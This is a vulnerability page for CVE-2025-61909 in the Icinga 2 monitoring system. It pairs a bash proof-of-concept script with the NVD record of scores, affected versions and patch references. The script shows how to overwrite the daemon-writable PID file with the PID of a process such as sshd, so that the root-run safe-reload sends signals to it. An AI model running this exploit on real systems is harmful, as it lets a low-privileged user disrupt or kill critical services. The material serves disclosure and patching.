CVE-2025-61909

#!/bin/bash # CVE-2025-61909 - Icinga 2 PID File Manipulation PoC # This PoC demonstrates how an attacker with Icinga user privileges # can trick the safe-reload script (running as root) into sending # signals to arbitrary processes. # Step 1: Identify the Icinga 2 PID file location PID_FILE="/var/run/icinga2/icinga2.pid" # Step 2: Check current permissions on the PID file ls -la $PID_FILE # Step 3: Identify a target process PID (e.g., a critical service) # Example: target PID of another service like sshd or a database TARGET_PID=$(pgrep -o sshd) echo "Target PID: $TARGET_PID" # Step 4: As the Icinga user, overwrite the PID file with the target PID echo $TARGET_PID > $PID_FILE # Step 5: Trigger the safe-reload (runs as root, reads PID file) # This can be done by: # a) Waiting for logrotate to trigger # b) Running: sudo systemctl reload icinga2 # c) Running: /usr/lib/icinga2/safe-reload # The root-owned script will read the manipulated PID and send # a signal (e.g., SIGHUP) to the target process. # Alternative: Send SIGTERM to a critical process # echo $TARGET_PID > $PID_FILE # systemctl reload icinga2 # triggers safe-reload as root # Step 6: Verify the target process received the signal ps -p $TARGET_PID

{"cve": {"id": "CVE-2025-61909", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:38.427", "lastModified": "2025-10-29T20:03:42.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Icinga 2 is an open source monitoring system. From 2.10.0 to before 2.15.1, 2.14.7, and 2.13.13, the safe-reload script (also used during systemctl reload icinga2) and logrotate configuration shipped with Icinga 2 read the PID of the main Icinga 2 process from a PID file writable by the daemon user, but send the signal as the root user. This can allow the Icinga user to send signals to processes it would otherwise not permitted to. A fix is included in the following Icinga 2 versions: 2.15.1, 2.14.7, and 2.13.13."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.10.0", "versionEndExcluding": "2.13.13", "matchCriteriaId": "3D988404-9FCC-4EE1-9826-4190836FB576"}, {"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.14.0", "versionEndExcluding": "2.14.7", "matchCriteriaId": "97F3EEA9-4057-4878-878D-AC7936D5C4BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga:2.15.0:*:*:*:*:*:*:*", "matchCriteriaId": "686BD1F1-5759-46F8-BAF4-72A481C53D4E"}]}]}], "references": [{"url": "https://github.com/Icinga/icinga2/commit/51ec73cbd922a76fc0f60e1d8d33acd7caa5d587", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Icinga/icinga2/issues/10527", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/Icinga/icinga2/security/advisories/GHSA-pg6g-g99v-mw46", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://icinga.com/blog/releasing-icinga-2-v2-15-1-2-14-7-and-2-13-13-and-icinga-db-web-v1-2-3-and-1-1-4", "source": "[email protected]", "tags": ["Release Notes"]}]}}